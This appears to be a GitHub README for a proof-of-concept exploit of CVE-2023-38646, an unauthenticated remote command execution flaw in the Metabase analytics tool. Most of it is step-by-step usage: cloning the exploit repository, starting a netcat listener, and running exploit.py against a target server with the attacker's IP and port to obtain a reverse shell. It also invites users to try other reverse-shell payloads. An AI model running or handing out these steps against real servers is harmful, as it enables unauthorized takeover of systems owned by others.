
This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool.

Primary LanguagePython

CVE-2023-38646 PoC


This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool. Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis.

This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication. The impact of this flaw was severe, as it granted unauthorized access to the server at the server's privilege level.

Proof of Concept (PoC) Steps

Clone this Repository

git clone https://github.com/threatHNTR/CVE-2023-38646.git

Navigate to the Repository

cd CVE-2023-38646

Before running the script, set Up a Netcat Listener

nc -nlvp chosen-port

Run the Script

python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

Exploitation: The script will attempt to send a reverse shell to the target Metabase server. If successful, you will receive a shell on your machine. Feel free to change the payload to try different reverse shells.
